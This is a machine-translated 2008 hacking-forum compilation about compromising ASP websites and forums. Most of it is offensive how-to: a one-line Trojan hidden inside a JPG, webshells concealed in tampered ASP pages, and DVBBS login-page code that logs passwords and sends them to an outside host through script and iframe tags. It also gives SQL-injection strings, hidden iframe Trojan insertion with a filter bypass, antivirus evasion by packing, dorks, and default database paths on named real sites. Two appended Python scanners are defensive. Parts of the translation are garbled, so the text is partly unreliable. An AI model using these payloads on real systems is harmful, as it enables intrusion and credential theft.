Become an ASP Trojan Master - Vulnerability Warning - Black Bar Security Net

ID MYHACK58:62200820740
Type myhack58
Reporter Anonymous
Modified 2008-10-19T00:00:00


1. Name: how to make a picture that carries an ASP Trojan still display as a picture

Build an asp file with the content <!-- # of i nclude file="ating.jpg"-->. Find a normal picture, ating.jpg, and insert a one-line Trojan (such as the ice Fox) into it by hex editing with ultraedit. For it to run successfully, also search the picture for <% and %> and change them to 00 (do not replace the ones in your own asp), and then add the following at the beginning of the jpg file.

The following is the code snippet: <SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request. form(#)+) </SCRIPT>

2. Name: tricky cafe

First use the Elite cafe auxiliary tool to get a username and password, then connect to a machine with Computer Management, enable telnet, connect, open a share, copy a Trojan over and run it.

3. Name: feel the charm of MD5 brute force

rainbowcrack usage: first use rtgen to generate the tables: "rtgen md5 byte 1 7 5 2 4 0 0 4 0 0 0 0 all". The 1 and 7 represent the minimum and maximum password length. Al statin I then added a method: crack online at http://md5.rednoize.com/ or go to http://www. md5lookup. com/? category=01-3&searck=on

4. A lot of the time we make a Trojan evade antivirus ("free kill") without understanding assembly; packing it with the Beidou packer is enough to escape detection. There are many packers, and when packing your Trojan it is best to pick several little-known ones.

5. Name: covert insertion type ASP Trojan

(1) In the asp file we want to tamper with, add the following content

The following is the code snippet: <%if request("action")="ok" then%>

The shell code is inserted here, preferably a small one ("pony"), and it should also be encrypted

The following is the code snippet: <%end if%>

When visiting, append ? action=ok to the asp file you tampered with

(2) Another method: in the asp file we want to tamper with, add the following content

The following is the code snippet: <% on error resume next strFileName = Request. QueryString("filer") set objStream = Server. createObject("ABODB. Stream") objStream. Type = 1 objStream. Open objStream. LoadFromFile strFileName objStream. SaveToFile Server. mappath("ating. asp"),2 %>

When accessing, append ? filer=XXX to the tampered asp file, where XXX is the path of the local file to upload, such as c:ating123.asp. After the upload, ating.asp is in the same folder as the tampered asp.

(3) This one requires system permission.

Go one level into the website directory and run mkdir s... then copy ating. asp s.../ so that antivirus software does not find it. After that, visiting http://website/s.../ating. asp works.

6. Tool: http://hack520.tengyi.cn/chaojiyonghu.rar This tool creates a super user on the computer, username: hack, password: 110. The user you created cannot be seen in DOS or in Computer Management, and is deleted.

7. Name: QQ group scripting attacks

Open the QQ dialogue, deceive, copy the message, then save the following content as a .vbs file and run it

The following is quoted fragment: Set WshShell= WScript. createobject("WScript. Shell") WshShell. AppActivate "QQ information attack script" for i=1 to 2 0 WScript. Sleep 1 0 0 0 WshShell. SendKeys"^v" WshShell. SendKeys i WshShell. SendKeys "%s" Next

8. Search for "program production: WAN Peng": in the free application space you can upload an asp Trojan directly.

9. Name: thoroughly finding the ASP Trojans on your site

(1) Use antivirus software.

(2) In the FTP client software, click "Tools" -> "comparing folders".

(3) Upload asplist2.0.asp to the site space and review the listing; from the general features of an ASP file I estimate whether it is an ASP Trojan.

(4) Use the tool Beyond Compare.
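For item 9, a sweep of a web root for the artifacts described in items 1, 5 and 10 (an image pulled into a page by an include, server-side script inside an image, a submitted password written out to a file, a directory named like s...). This is an added example, not part of the original post; the rule names and sample file bodies are constructed, and the patterns are a starting point rather than a complete signature set.

```python
import re
import tempfile
from pathlib import Path

IMAGE_EXT = {".jpg", ".jpeg", ".gif", ".png", ".bmp"}
SCRIPT_EXT = {".asp", ".asa", ".cer", ".cdx"}
# A bare "<%" occurs by chance in compressed image data, so images are only
# flagged on a server-side script tag or "<%" followed by eval/execute.
CODE_IN_IMAGE = re.compile(rb"runat\s*=\s*[\"']?server|<%\s*(eval|execute)\b", re.I)
SCRIPT_RULES = [  # (rule name, pattern) applied to script files
    ("image-include", re.compile(
        rb"#\s*include\s+(file|virtual)\s*=\s*\"[^\"]+\.(jpe?g|gif|png|bmp)\"", re.I)),
    ("exec-of-request", re.compile(rb"\b(eval|execute)\s*\(?\s*request\b", re.I)),
    ("password-written-out", re.compile(
        rb"\.write(text)?\b[^\r\n]*request\s*\(\s*\"password\"", re.I)),
]

def scan_webroot(root):
    """Return sorted (relative_path, rule) findings for one web root."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):
        rel = path.relative_to(root).as_posix()
        if path.is_dir():
            if path.name.endswith("."):  # e.g. the "s..." directory of item 5
                findings.append((rel, "dir-name-ends-with-dot"))
            continue
        data, ext = path.read_bytes(), path.suffix.lower()
        if ext in IMAGE_EXT and CODE_IN_IMAGE.search(data):
            findings.append((rel, "server-code-in-image"))
        elif ext in SCRIPT_EXT:
            findings += [(rel, name) for name, rx in SCRIPT_RULES if rx.search(data)]
    return sorted(findings)

def demo():
    """Scan a constructed sample site; the file bodies are inert stand-ins."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "s...").mkdir()
        (root / "logo.jpg").write_bytes(b"\xff\xd8\xff\xe0JFIF<% random bytes")
        (root / "ating.jpg").write_bytes(
            b"\xff\xd8\xff\xe0JFIF<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT></SCRIPT>")
        (root / "show.asp").write_bytes(b'<!-- #include file="ating.jpg" -->')
        (root / "login.asp").write_bytes(b'<% tsObject.Write CStr(request("password")) %>')
        (root / "index.asp").write_bytes(b'<% Response.Write "hello" %>')
        return scan_webroot(root)

if __name__ == "__main__":
    print(*demo(), sep="\n")
```

Pattern matching of this kind complements, and does not replace, the folder comparison against a known-good copy in (2) and (4), which also catches changes no signature anticipates.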

10. Name: expanding ideas for getting DVBBS accounts, the "one man's Bible" animation

(1) With a webshell already obtained, getting into the DVBBS backend still requires the administrator password. The old way: modify admin_login. asp to record the DVBBS backend password in plaintext. After the line "username=trim(replace(request("username")" add: Dim fsoObject Dim tsObject Set fsoObject = Server. createObject("Scripting. FileSystemObject") set tsObject = fsoObject. createTextFile(Server. MapPath("laner.txt")) tsObject. Write CStr(request("password")) Set fsoObject = Nothing Set tsObject = Nothing As soon as the administrator logs in to the backend, laner.txt is generated in the directory.

(2) In login. asp, below Case "login_chk":

The following is the code snippet:

on error resume next Dim rain set rain=server. createobject("adodb. stream") rain. Type=2 rain. CharSet="gb2312" rain. Position=rain. Size rain. Open rain. LoadFromFile server. MapPath("laner. asp") rain. writetext now&request("username")&"text:"&request("password")&chr(1 0) rain. SaveToFile server. MapPath("laner. asp"),2 rain. Close set rain=nothing

This way laner. asp collects the login time, user name and password of everyone who logs in

(3) If you have your own website or another webshell (strongly recommended):

Create a directory laner, and inside it create an empty laner. asp and a rain. asp containing the following code:

The following is the code snippet: <%if request("n")<>"" and request("p")<>"" then on error resume next Dim rain set rain=server. createobject("adodb. stream") rain. Type=2 rain. CharSet="gb2312" rain. Position=rain. Size rain. Open rain. LoadFromFile server. MapPath("laner. asp") rain. writetext now&"Name:"&request("n")&"Password:"&request("p")&chr(1 0) rain. SaveToFile server. MapPath("laner. asp"),2 rain. Close set rain=nothing end if%>

11. Name: using QQ online status to catch pigeon "broilers" (compromised machines)

Generate a QQ online-status link, change the address inside it to the Trojan address, and send it to the forum. In login. asp, insert this statement:

The following is the code snippet: response. write"<scriptsrc=http://www. ptlushi. com/laner/rain. asp? n="&request("username")

&""&"&p="&request("password")&"></script>" response. write"<iframesrc=http://yourwebsite/laner/rain. asp? n="&request("username")


As a result, the name and password of everyone who logs in are sent to your laner. asp.

12. Animation name: multiple vulnerabilities in the Media China whole-site program

Vulnerable program: Media China whole-site program (first version). Official site: http://meiti. elgod. com/ Vulnerabilities: %5c (storm library), upload, injection. Upload page: down1/upload. asp

13. Name: Free Phone + MSH command-line tool

Open the home page http://www.globe7.com/, click Free DownLoad in the lower-left corner, download it locally and install it. After it runs, the prompt is "Looking for your area code". Because these are international calls, registering an account gives you 100 cents; domestic calls are billed at 0.01/min, so you have 100 minutes to call for free. That is for one account.

Note that for fixed telephones and PHS the format is 0086521123456, where 521 was originally 0521 with the leading zero omitted; the phone number is the same.

14. Name: a new Bo-Blog vulnerability

http://[site address]/index.php?job=../admin/ban Save the <table> part for "a forbidden search of the words" from that page, change the address inside it to the complete address, and insert a one-line Trojan

15. Name: hook soul's invasion of Legend private servers

Search Baidu for legendary inurl:tuku, or legendary inurl:wplm.htm, or legendary inurl:coolsites. asp, and insert a one-line Trojan through the link.

16. Program: upload vulnerability in the hongda enterprise whole-site program. Official home page: http://www. mu126. com/ Vulnerable page: /cx/upfile. asp (upload vulnerability)

17. No Pirates of the mailbox, modify the password: in the user name and password, add or=or

18. Name: getting a webshell from the bbsxp5.16 backend

bbsxp5.16 filters the asp, asp, cdx and cer file extensions, adding them to the upload types in the basic settings does not work either, and it prohibits changing the name of the data backup. We can save this web page locally, modify the source code, and upload.

19. Name: JHACKJ 2005 latest classic tutorial

Download it and take a look; it is good, and every big website has it

20. Name: the effortless invasion of South Korea broilers

In the injection-point scan of ? D, open this: http://www.google.co.kr/advanced_search?hl=zh-CN (this is the advanced search page). Write any keywords; here I write asp? name= and set it to display 100 results per page. Select Korean as the language. Search: a lot of sa.

21. Name: cracking any Internet cafe management system

Select the Smart ABC input method, type vv, move the cursor back two positions, press the Delete key to delete the two v characters just entered, and finally press the Enter key.

22. Name: cracking the QQ space block on inserting web page Trojan code

Tencent has now blocked a lot of QQ space code; the earlier <iframe src="Trojan address" name="lcx" width="0" height="0" frameborder="0"></iframe> code for inserting a web page Trojan was among the first to be blocked. The code for getting around the block is as follows:

The following is the code snippet: <div id=DI><img src="javascript :DI. innerHTML=\<iframe src=Trojan address width=1 9 0 height=1 9 0

marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no></iframe>\"


Finally, attached is the summary by Kara is ok

1. Upload vulnerability [not covered here]. PS: if you see "Choose your file to upload [re-upload]" or a "please login" prompt, there is an 80% chance of a vulnerability! Sometimes the upload does not succeed; that is because the Cookies are not the same. We use WSockExpert to obtain the Cookies, then upload with DOMAIN.

2. Injection vulnerability [not covered here]

PS: on MD5 passwords. Sometimes they are not easy to crack. If it is an [SQL database], we can use the following command: http://[injection URL];update admin set password=\new MD5 password\ where password=\old MD5 password\-- [admin is the table name.]

3. Side note, that is, going across sites.

The site we are going after may be sturdy and invulnerable. We can find another site on the same server, then use that site with privilege escalation, sniffing and other methods to get into the site we want. One difficulty here is that on some servers the absolute path is encrypted, and that is up to our skill.

4. Storm library: replace the / between two directories with %5c. EY:http://www. ahttc. edu. cn/otherweb/dz/bgs/BigClass. asp? BigClassName=mandate&BigClassType=1 If you can see: \E:ahttc040901otherwebdzdatabaseiXuEr_Studio.asa\ is not a valid path. Make sure that the path name is spelled correctly and that you are connected to the server on which the file resides. This is the database. Download it with FLASHGET and change it to .MDB format.

5. \ or\=\or\ This is a phrase that can be joined onto the SQL statement. You can go directly into the backend. I collected a few. Similar: \or\\=\ " or "a"="a \) or (\a\=\a ") or ("a"="a or 1=1-- \ or \a\=\a

6. Social engineering. We all know this one. It is just guessing. EY: the http://www.neu.edu.cn/waishi/admin admin waishi

7. Writing into an ASP-format database. This is the one-line Trojan [<%execute request("value")%>], commonly used on guestbooks. EY: the http://www.ahsdxy.ah.edu.cn/ebook/db/ebook.asp [this is an ASP-format database], and then write in the one-line Trojan

8. Source code: some web sites use source code downloaded online, and some webmasters are very inexperienced and change nothing. EY:http://www. ahsdxy. ah. edu. cn/xiaoyoulu/index. asp This site uses: outstanding alumni; I have the source. Default database/webshell path: databaseliangu_data. the mdb backend management: adm_login. asp password and username are both admin

9. Use of default database/webshell paths: there are a lot of such sites, and other people's WEBSHELLs. /Databackup/dvbbs7. MDB /bbs/Databackup/dvbbs7. MDB /bbs/Data/dvbbs7. MDB /data/dvbbs7. mdb /bbs/diy. asp /diy. asp /bbs/cmd. asp /bbs/cmd.exe /bbs/s-u.exe /bbs/servu.exe Tools: website Hunter, mining chicken. EY: the http://www.cl1999.com/bbs/Databackup/dvbbs7.MDB

10. Viewing directories: some sites allow a directory to be listed, so you can view the directory. EY: the http://www.ujs168.com/shop/admin/ http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/

That way we can find the database; downloading it I do not need to teach.

11. Tool overflow: . asp? NewsID= a /2j. asp? id=18 . asp? id= [this method can get a lot of WEBSHELLs]

12. Using search engines:

(1). inurl:flasher_list. asp default database: database/the flash. the mdb backend: /manager/

(2). Looking for a website's management backend address: site:xxxx. comintext:management site:xxxx. comintitle:management <there are many keywords, look for them yourself> site:xxxx. cominurl:login

(3). Finding access database, mssql and mysql connection files: allinurl:bbsdata filetype:mdbinurl:database filetype:incconn inurl:datafiletype:mdb

I will not do these. Do them yourself.

13. COOKIE deception:

Change your own ID to the administrator's, and change the MD5 password to his as well; with the Guilin veterans tool you can modify COOKIES. I will not say more on this.

14. Exploiting a common vulnerability, such as in the dynamic network BBS. EY: the http://js1011.com/bbs/index.asp You can start with the dvbbs privilege elevation tool, so that you become a front-end administrator. THEN use the dynamic network sticky-post tool: find a sticky post and obtain the COOKIES; this you do yourself. We can use WSockExpert to obtain Cookies or capture packets with NC. I will not do this here; there are tutorials online, have a look yourself.

Tools: dvbbs privilege elevation tool, dynamic network sticky-post tool

15. There are some old vulnerabilities.

Such as IIS3 and 4 source code viewing, 5's delete, CGI, and some old PHP holes; I will not cover them. Too old. They are of little use.
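Several of the techniques in the summary leave recognisable requests in the web server log: the %5c substitution, direct requests for database files such as dvbbs7.MDB, a ;update statement appended to an injection URL, and the s.../ directory from item 5. The following is an added example, not part of the original post, that flags them; the log layout, rule names and sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Rules take the URI stem and query string of one request as logged.
RULES = [
    ("backslash-in-path", lambda stem, query: "\\" in unquote(stem)),
    ("database-file-request",
     lambda stem, query: re.search(r"\.(mdb|asa)$", unquote(stem), re.I)),
    ("stacked-sql-statement",
     lambda stem, query: re.search(r";\s*(update|insert|delete|drop)\b",
                                   unquote(query), re.I)),
    ("dot-suffixed-directory",
     lambda stem, query: re.search(r"/[^/]*\.{2,}/", unquote(stem))),
]

def detect(log_lines):
    """Return (client_ip, rule, status) for each rule hit, in log order."""
    hits = []
    for line in log_lines:
        fields = line.split()
        if line.startswith("#") or len(fields) != 7:
            continue  # skip directives and lines that do not fit the layout
        _date, _time, ip, _method, stem, query, status = fields
        for name, rule in RULES:
            if rule(stem, query):
                hits.append((ip, name, int(status)))
    return hits

# Constructed sample log; the field layout is an assumption, match it to the
# "#Fields:" directive of your own logs. Addresses are documentation ranges.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2008-10-19 10:00:01 198.51.100.7 GET /bbs/index.asp - 200
2008-10-19 10:00:02 203.0.113.9 GET /otherweb/dz%5cbgs/BigClass.asp BigClassType=1 500
2008-10-19 10:00:03 203.0.113.9 GET /bbs/Databackup/dvbbs7.MDB - 200
2008-10-19 10:00:04 203.0.113.20 GET /news.asp id=1;update%20admin%20set%20password=x 200
2008-10-19 10:00:05 203.0.113.20 GET /s.../ating.asp - 200
""".splitlines()

if __name__ == "__main__":
    print(*detect(SAMPLE_LOG), sep="\n")
```

A 200 status on a database-file-request hit means the file was actually served, so the database should be moved out of the web root and its stored passwords treated as exposed.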